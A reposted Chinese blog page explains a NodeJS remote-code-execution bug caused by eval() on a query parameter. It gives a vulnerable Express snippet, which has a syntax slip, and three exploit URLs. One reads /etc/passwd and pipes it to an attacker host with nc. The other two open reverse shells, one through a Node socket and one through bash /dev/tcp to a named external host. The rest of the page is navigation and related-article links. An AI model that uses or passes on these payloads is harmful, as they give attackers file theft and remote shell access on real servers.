首页
所有分类
TAGS
文字工具 EMOJI BIBLE
服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐
nodejs win7下安装方法
May 24 NodeJs
nodejs之get/post请求的几种方式小结
Jul 26 NodeJs
浅谈nodejs中的类定义和继承的套路
Jul 26 NodeJs
nodejs爬虫初试superagent和cheerio
Mar 05 NodeJs
nodejs简单访问及操作mysql数据库的方法示例
Mar 15 NodeJs
Nodejs把接收图片base64格式保存为文件存储到服务器上
Sep 26 NodeJs
nodejs中用npm初始化来创建package.json的实例讲解
Oct 10 NodeJs
nodejs使用async模块同步执行的方法
Mar 02 NodeJs
详解NodeJS Https HSM双向认证实现
Mar 12 NodeJs
Nodejs实现图片上传、压缩预览、定时删除功能
Oct 25 NodeJs
NodeJS实现一个聊天室功能
Nov 25 NodeJs
nodejs中的异步编程知识点详解
Jan 17 NodeJs
用NodeJS实现批量查询地理位置的经纬度接口
Aug 16 #NodeJs
使用nodejs中httpProxy代理时候出现404异常的解决方法
Aug 15 #NodeJs
NodeJs的优势和适合开发的程序
Aug 14 #NodeJs
在windows上用nodejs搭建静态文件服务器的简单方法
Aug 11 #NodeJs
Nodejs抓取html页面内容(推荐)
Aug 11 #NodeJs
用nodejs的实现原理和搭建服务器(动态)
Aug 10 #NodeJs
nodejs如何获取时间戳与时间差
Aug 03 #NodeJs
maven(2) 动态权限(1) V Rising(1) Navicat(1) 内置函数(1) Kotlin(1) Spring Security(2) Android Gradle(1) 自定义函数(1) 记事本(1)
You might like
php数据类型判断函数有哪些
2013/09/23 PHP
php通过ajax实现双击table修改内容
2014/04/28 PHP
PHP使用strstr()函数获取指定字符串后所有字符的方法
2016/01/07 PHP
Yii模型操作之criteria查找数据库的方法
2016/07/15 PHP
php封装的pdo数据库操作工具类与用法示例
2019/05/08 PHP
兼容FireFox 的 js 日历 支持时间的获取
2009/03/04 Javascript
js 绑定带参数的事件以及手动触发事件
2010/04/27 Javascript
ASP.NET jQuery 实例15 通过控件CustomValidator验证CheckBoxList
2012/02/03 Javascript
jquery的选择器的使用技巧之如何选择input框
2013/09/22 Javascript
仿JQuery输写高效JSLite代码的一些技巧
2015/01/13 Javascript
scrollWidth,clientWidth,offsetWidth的区别
2015/01/13 Javascript
jQuery实现带渐显效果的人物多级关系图代码
2015/10/16 Javascript
jQuery实现只允许输入数字和小数点的方法
2016/03/02 Javascript
JS定义类的六种方式详解
2016/05/12 Javascript
浅析JavaScript中的array数组类型系统
2016/07/18 Javascript
jQuery中 DOM节点操作方法大全
2017/10/12 jQuery
jQuery实现鼠标响应式淘宝动画效果示例
2018/02/13 jQuery
区别JavaScript函数声明与变量声明
2018/09/12 Javascript
加快Vue项目的开发速度的方法
2018/12/12 Javascript
了解javascript中let和var及const关键字的区别
2019/05/24 Javascript
原生JS无缝滑动轮播图
2019/10/22 Javascript
[01:01:24]DOTA2上海特级锦标赛A组败者赛 EHOME VS CDEC第三局
2016/02/25 DOTA
python将文本中的空格替换为换行的方法
2018/03/19 Python
matplotlib.pyplot绘图显示控制方法
2019/01/15 Python
华为2019校招笔试题之处理字符串(python版)
2019/06/25 Python
Django框架之DRF 基于mixins来封装的视图详解
2019/07/23 Python
PyTorch中permute的用法详解
2019/12/30 Python
HTML5拖拉上传文件的简单实例
2017/01/11 HTML / CSS
欧洲最大的美妆零售网站:Feelunique
2017/01/14 全球购物
科室工作的个人自我评价
2013/10/30 职场文书
函授自我鉴定
2013/11/06 职场文书
电子信息科学专业自荐信
2014/01/30 职场文书
建筑投标担保书
2014/05/20 职场文书
银行保安拾金不昧表扬稿
2015/05/05 职场文书
通过shell脚本对mysql的增删改查及my.cnf的配置
2021/07/07 MySQL
tree shaking对打包体积优化及作用
2022/07/07 Java/Android